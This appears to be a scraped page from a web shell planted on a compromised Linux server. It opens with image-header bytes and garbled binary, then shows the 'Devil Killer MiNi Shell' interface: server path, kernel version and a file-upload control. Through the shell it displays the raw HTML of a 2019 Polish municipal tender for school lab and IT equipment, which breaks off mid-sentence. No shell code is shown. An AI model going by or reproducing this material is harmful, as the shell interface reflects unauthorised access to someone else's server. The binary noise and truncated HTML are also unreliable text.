JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191009/607613-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 607613-N-2019 z dnia 2019-10-09 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Kościan</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Poprawa warunków dydaktycznych dla uczniów w szkołach na terenie Gminy Kościan - doposażenie pracowni przedmiotowych - II przetarg</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Projekt objęty jest współfinansowaniem ze środków Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2014-2020 Oś priorytetowa 8: Edukacja Działanie 8.1. Ograniczenie i zapobieganie przedwczesnemu kończeniu nauki szkolnej oraz wyrównanie dostępu do edukacji przedszkolnej i szkolnej Poddziałanie 8.1.2. Kształcenie ogólne - projekty konkursowe</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Kościan</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">41105058600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Młyńska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">15</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">64-000</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kościan</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">655 121 001</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">agnieszkamackowiak@gminakoscian.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">655 120 315</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.gminakoscian.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.gminakoscian.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Kościan, ul. Młyńska 15, 64-000 Kościan</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Poprawa warunków dydaktycznych dla uczniów w szkołach na terenie Gminy Kościan - doposażenie pracowni przedmiotowych - II przetarg</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.272.15.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">nie zastrzega</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">Wykonawcy może zostać udzielone zamówienie na obie części zamówienia</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest dostawa sprzętu Planuje się doposażenie w każdej szkole (2 szkoły): pracowni matematycznej, pracowni biologicznej, pracowni fizycznej, pracowni geograficznej, pracowni chemicznej oraz pracowni przyrodniczej (łącznie 12 pracowni).Część 1 pn. ,,Dostawa pomocy naukowych"W zakres zamówienia wchodzi dostawa takich pomocy naukowych jak: Mikroskop z podłączeniem do komputera - szt. 2, Fartuchy laboratoryjne - szt. 60, Apteczka z wyposażeniem - szt. 2, Tacki, deski do krojenia - szt. 30, Mikroskopy optyczne (szkolne, stereoskopowe) - szt. 30, Mikroskopy terenowe - szt. 20, Waga laboratoryjna - szt. 2, Skalpele , nożyczki - 30 zestawów, Lornetki - 30 szt., lupy - 30 szt., Ciśnieniomierz - 2 szt, Czerpak do pobierania próbek wody - 30 szt, Termometry laboratoryjne - 30 szt., Pęsety - 30 szt., Zestaw preparatów mikroskopowych - bezkręgowce - 30 zestawów, Zestaw preparatów mikroskopowych - rośliny jadalne 30 zestawów, Zestaw preparatów mikroskopowych - tkanki ssaków 30 zestawów, Zestaw preparatów mikroskopowych - grzyby 30 zestawów, Zestaw preparatów mikroskopowych - tkanki człowieka zdrowe - 30 zestawów, Zestaw preparatów mikroskopowych - tkanki człowieka zmienione chorobowo - 30 zestawów, Zestaw preparatów mikroskopowych - preparaty zoologiczne - 30 zestawów, Model szkieletu człowieka - 2 szt. , Model serca - 20 szt. , Model skóry człowieka - 2 szt., Model budowy anatomicznej człowieka - 2 szt, Akwarium do hodowli roślin wodnych - 2 szt., Cyfrowe, mobilne laboratorium biologiczno-chemiczne - 4 szt., Dygestorium - 2 szt. , Tace laboratoryjne - 30 szt., Butelki do roztworów z doszlifowanym korkiem - 60 szt., Palniki gazowe - 30 szt. , Szczypce metalowe - 60 szt. , Waga laboratoryjna z dokładnością do 0,1g - 20 szt., Podnośniki - 20 szt., Zlewki różnej wielkości - 30 kpl., Bagietki - 60 szt., Termometry laboratoryjne - 30 szt., Rozdzielacze - 30 szt., Parownica porcelanowa - 30 szt., Tryskawki - 30 szt., Elektrody grafitowe - 30 szt., Łyżki laboratoryjne - 60 szt., Łyżki do spalań - 30 szt., Korki do probówek z otworem - 60 szt., Kolba okrągło denna - 30 szt., Kolba stożkowa - 30 szt., Cylinder miarowy plastikowy wysoki - 30 szt, moździerz porcelanowy z tłuczkiem 100mm - 30 szt., Bibuła laboratoryjna - 2 opakowania, Parafilm - 2 szt., Metale, niemetale, tlenki, wodorotlenki, kwasy, sole, alkohole, cukry - 2 zestawy, Białka, albumina - 2 szt., Szczotki laboratoryjne - 10 szt., Modele do budowania cząsteczek - 2 zestawy, Tabela rozpuszczalności - plansza - 2 szt, Pipety Pasteura - 2 zestawy, Probówki - 10 sztuk - 20 zestawów, Butelka z zakraplaczem - 30 szt., Szalki Petriego - 60 szt., Statyw - 10 szt., zestaw szkiełek nakrywkowych - 10 zestawów, suszarka na szkło laboratoryjne - 2 szt., okulary ochronne - 60 szt., Fartuch laboratoryjny - 60 szt., Szafa (metalowa z odciągiem) na odczynnik - 2 szt., Cyfrowe, mobilne laboratorium uniwersalne - 4 szt., wskaźnik laserowy - 2 szt., Suwmiarki - 10 szt., Palniki gazowe - 30 szt., Taśma miernicza - 4 szt, Pudelko z opiłkami ferromagnetycznymi - 4 szt., Zestaw magnesów 28 elementów - 2 zestawy, Zestaw soczewek - 2 zestawy, Lusterko wklęsło wypukłe - 4 szt. , pryzmat akrylowy lub szklany - 4 szt., Samochodzik -zabawka z napędem elektrycznym o zasilaniu bateryjnym - 2 szt., Zasilacz prądu stałego o możliwym poborze prądu 3A z zabezpieczeniem przeciw przeciążeniowym - 2 szt., Mierniki uniwersalne z osobnym gniazdem 10A wyposażone możliwość pomiaru temperatury - 4 szt., rurka do demonstracji zjawiska konwekcji - 2 szt., Generator van de Graaffa - 2 szt., Teleskop - 2 szt., Statyw Z wyposażeniem - 2 szt., Izolowane przewody (komplet 10 szt) - 4 kpl., Opornik (10 sztuk) - 2 kpl. , Żarówki miniaturowe 3,5 V - 20 szt., Oprawka do żarówek miniaturowych - 20 szt., Dioda LED - 20 szt., magnes neodymowy - 20 szt., Pojemnik próżniowy z pompką - 2 szt., Szkła optyczne (zestaw) - 2 zestawy, Sprężynka ,,slinky" - 2 szt., GPS - 2 szt., Kompas - 50 szt., nawigacja satelitarna - 2 szt., Atlasy - 50 szt. , Mapy ścienne świata - ogólno geograficzna - 2 szt., Mapy ścienne świata - klimatyczna - 2 szt., Mapa ścienna - Europa - 2 szt., Mapa ścienna - Ameryki - 2 szt., mapy ścienne Arktyki i Antarktyki - 2 szt., wspólna mapa dla wszystkich trzech elementów (tektoniki i płyt litosfery) 2 szt., Globus uczniowski - 50 szt., Globus w większej skali - 2 szt., Globus indukcyjny - 2 szt., Tellurium lub inny model przedstawiający wzajemne relacje Ziemi, Słońca i Księżyca 2 szt., Mapy topograficzne najbliższej okolicy - 30 szt., Plan miasta, w którym znajduje się szkoła lub innego najbliższego oraz plan Paryża, Londynu lub innej światowej metropolii - 30 szt., okazy skał i minerałów oraz przykłady skamieniałości - 2 szt., Tablica ,,Profile glebowe" - 2 szt., Mapy turystyczne różnych regionów Polski i Europy - 30 szt., Mapy samochodowe Polski, regionów Polski i Europy - 30 szt., dane statystyczne w formie publikacji (np. roczniki statystyczne) - 30 szt., Mapy ścienne Polski - podział administracyjny, ogólno geograficzna - 4 szt., Publikacje albumowe - 4 szt., Teleskop - 2 szt., Cyfrowe, mobilne laboratorium do fizyki - 4 szt., zestaw matematycznych gier dydaktycznych i logicznych - 4 zest., Bryły geometryczne - zestaw - 2 zestawy, siatki brył i figur geometrycznych - 2 zestawy, Pracownia mat. Bryły nieregularne - 2 zestawy, Pracownia mat. Zestawy tablicowe/plansze dydaktyczne - 2 zestawy, Zestaw miar - 2 zestawy, Lupa - 60 szt., Pudełko do obserwacji okazów (z 2 lupami) - 30 szt. , Lornetka - 30 szt., Mikroskop z podłączeniem do komputera - 10 szt., Zestaw preparatów do mikroskopowych - tkanki ssaków 2 zestawy, Zestaw preparatów do mikroskopowych - co żyje w kropli wody - 2 zestawy, Zestaw preparatów do mikroskopowych - tkanki człowieka - 2 zestawy, Zestaw preparatów do mikroskopowych - preparaty zoologiczne - 2 zestawy, Zestaw preparatów do mikroskopowych - przyroda - 2 zestawy, Zestaw preparatów do mikroskopowych biologicznych - 2 zestawy, Taśma miernicza - 2 szt., Stoper - 2 szt., Termometr zaokienny - 2 szt., Kompas - 10 szt., Deszczomierz - 2 szt., Barometr - 2 szt. , Wiatromierz - 2 szt., Zestaw siłomierzy - 2 zestawy, Zestaw pałeczek do elektryzowania - 4 zestawy, Przewodniki i izolatory - 10 szt., Izolowane przewody do 45 cm - 2 kpl., Baterie o różnej sile elektromotorycznej - 2 zestawy, zestaw magnesów -28 elementów - 2 zestawy, pudełko z opiłkami ferromagnetycznymi - 2 szt., Magnesy neodymowe - 10 szt., Igła magnetyczna - 2 szt., Zestaw soczewek - 2 zestawy, Zestaw optyczny - mieszanie barw - krążek Newtona - 2 szt., Zestaw kostek o różnych objętościach i równych masach - 2 zestawy, Piłeczki różnych rozmiarów i różnym stopniu sprężystości. - 2 zestawy, Latarka z żarówką o dużej mocy i laserem czerwonym - 10 szt., Zestaw skali minerałów - 2 zestawy, Ciśnieniomierz - 2 szt., Zlewki różnej wielkości - 2 kpl., Butelki z zakraplaczem - 4 szt., Statyw - 2 szt., Pęseta - 30 szt., Pudełko plastikowe na preparaty - 10 szt., Wskaźniki pH - 2 zestawy, Zestaw akwarystyczne - 2 zestawy, Przenośny zestaw do badania wody - 2 zestawy, Rękawiczki lateksowe - 2 opakowania, Czajnik elektryczny bezprzewodowy z regulacja temperatury - 2 szt., Listwa zasilająca - 2 szt., Globus indukcyjny - 2 szt., Globus fizyczny - 2 szt., Globus fizyczny duży - 2 szt., Globus konturowy - 2 szt., Globus konturowy podświetlany - 2 szt., Polska mapa ścienna, fizyczna. - 2 szt., Świat - mapa fizyczna - 2 szt., Europa - mapa fizyczna - 2 szt, Krajobraz świata - mapa - 2 szt., Krajobraz świata - mapa, Ochrona przyrody w Polsce-mapa - 2 szt., mapy topograficzne najbliższej okolice - 30 szt., obrotowa mapa nieba - 30 szt., Model szkieletu człowieka skala 1:1 - 2 szt., szkielet człowieka z ruchomymi elementami skala 1:2 - 2 szt., Modele ; szkielet ryby, płaza, gada, ptaka, ssaka - 2 zestawy, Fantom - dziecinny manekin ratowniczy - 2 szt., Plansza roślin trujących - 2 szt., Plansza grzyby trujące - 2 szt., Plansze obrazujące zmysły człowieka - 2 szt. , Plansza wskaźników biologicznych środowiska, skala porostowa - 2 szt. , Plansza budowa kwiatu, rodzaje kwiatostanów, rodzaje liści i korzeni - 2 szt., Plansze etapów rozwoju człowieka - 2 szt., Plansze rodzajów chmur - 2 szt., Plansze obiegu wody w przyrodzie - 2 szt. , Przewodnik do rozpoznawania drzew - 30 szt., Przewodnik do rozpoznawania zwierząt - 30 szt., Atlas pogoda i klimat - 30 szt., Atlas ptaków w Polsce - 10 szt., Atlas owadów - 10 szt. , Atlas grzybów - 10 szt., Atlas minerałów, kamieni szlachetnych i skał - 10 szt., Atlas zwierząt chronionych w Polsce - 4 szt., Atlas roślin chronionych w Polsce - 10 szt., Atlas geograficzny - 30 szt., Atlas przyrodniczy - 30 szt., Mały atlas anatomiczny - 30 szt., Przewodnik do rozpoznawania grzybów - 10 szt., Magnesy do tablicy - 4 opakowania, Strzykawki jednorazowe - 60 szt., MERGE CUBE SMART KOSTKA ZABAWA i NAUKA - iOS/Andro - nie gorszy niż/ lub równoważny - 2 szt., Układ okresowy - plansza - 2 szt., Mapa ścienna - Afryki - 2 szt., mapa ścienna ogólnogeograficzna Australii - 2 szt.Szczegółowy opis zamówienia znajduje się w załączniku nr 4 do SIWZCzęść 2 pn: ,,Dostawa sprzętu IT"W zakres zamówienia wchodzi dostawa:- Laptopy - 8 szt.- Monitor interaktywny dotykowy ze statywem - 2 szt.- Drukarka 3D - 1 szt- Aparat fotograficzny - 2 szt.- Odtwarzacz CD z głośnikami - 2 szt.- Monitor interaktywny dotykowy - 2 szt.Szczegółowy opis zamówienia znajduje się w załączniku nr 6 do SIWZ</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39162100-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30236000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32420000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32322000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita 